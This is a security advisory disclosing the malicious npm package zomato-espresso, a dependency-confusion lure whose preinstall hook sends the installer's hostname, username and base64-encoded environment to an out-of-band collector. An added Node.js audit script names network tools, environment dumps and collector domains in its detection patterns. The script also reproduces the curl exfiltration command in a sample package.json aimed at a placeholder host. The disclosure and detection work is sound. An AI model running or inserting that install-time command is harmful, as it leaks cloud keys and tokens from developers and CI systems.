MAL-2026-6269
Malicious code in zomato-espresso (npm)
Details
## Source: amazon-inspector (860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d)

The package is a dependency-confusion lure targeting Zomato's internal namespace. Its package.json declares a `preinstall` hook that runs curl on every `npm install`, posting the installer's hostname (`hostname -f`), username (`whoami`), current working directory, and the entire process environment (base64-encoded via `env | base64 -w0`) over plain HTTP to an interactsh out-of-band collector at d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site. The URL path embeds the package name and the form fields exfiltrate `host`, `user`, `cwd`, and `env`, so any CI or developer environment that misresolves Zomato's internal package name to this public release leaks AWS keys, GITHUB_TOKEN, NPM_TOKEN, and any other secrets exposed in the environment. A `preuninstall` hook performs a similar host beacon. The package's own functionality is a stub (`index.js` exports only `{name, version}`); its sole purpose is the install-time beacon. The description string self-identifies as `Zomato's PDF generator service`, confirming the dependency-confusion reconnaissance intent against Zomato's private namespace.
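As an added example (not part of this advisory or the package), a small Node.js audit that flags npm install-lifecycle scripts carrying the traits described above: a network client, host/user probes, an environment dump, base64 encoding, cleartext HTTP, and known out-of-band collector domains. The sample package.json is constructed to mirror the description; `collector.example` is a placeholder, not the real endpoint.

```javascript
// Added example: audit npm lifecycle scripts for the install-time beacon pattern.
// Hooks npm runs automatically around install/uninstall.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare',
                   'preuninstall', 'uninstall', 'postuninstall'];

// Each indicator is one trait of the beacon described in the advisory.
const INDICATORS = [
  ['network-client', /\b(curl|wget|nc|ncat)\b/],
  ['host-recon',     /\b(hostname|whoami|uname)\b/],
  ['env-dump',       /\b(env|printenv)\b|\$\{?[A-Z_]*(TOKEN|KEY|SECRET)/],
  ['encoding',       /\bbase64\b/],
  ['cleartext-http', /http:\/\//],
  ['oob-collector',  /\.(oast\.(site|fun|pro|live|me|online)|interact\.sh|burpcollaborator\.net)\b/],
];

// Returns one finding per lifecycle hook present in package.json.
function auditLifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const hits = INDICATORS.filter(([, re]) => re.test(cmd)).map(([name]) => name);
    // A network client combined with recon or an environment dump is the beacon shape;
    // any single indicator alone is only worth a look.
    const severity = hits.includes('network-client') &&
      (hits.includes('env-dump') || hits.includes('host-recon')) ? 'high'
      : hits.length ? 'medium' : 'info';
    findings.push({ hook, severity, indicators: hits });
  }
  return findings;
}

// Constructed sample modelled on the advisory text (placeholder collector host).
const SAMPLE = {
  name: 'zomato-espresso',
  scripts: {
    preinstall: 'curl -s -X POST --data-urlencode "host=$(hostname -f)" ' +
      '--data-urlencode "user=$(whoami)" --data-urlencode "cwd=$(pwd)" ' +
      '--data-urlencode "env=$(env | base64 -w0)" http://collector.example/zomato-espresso',
    preuninstall: 'curl -s http://collector.example/zomato-espresso/$(hostname -f)',
    test: 'node test.js', // not a lifecycle hook, ignored by the audit
  },
};

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE), null, 2));
```

Run it against an extracted tarball's package.json before allowing the install; a `high` finding on `preinstall` or `preuninstall` is the pattern this advisory describes.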
Affected packages
No fixed version published yet for zomato-espresso (npm). Pin to a known-safe version or switch to an alternative.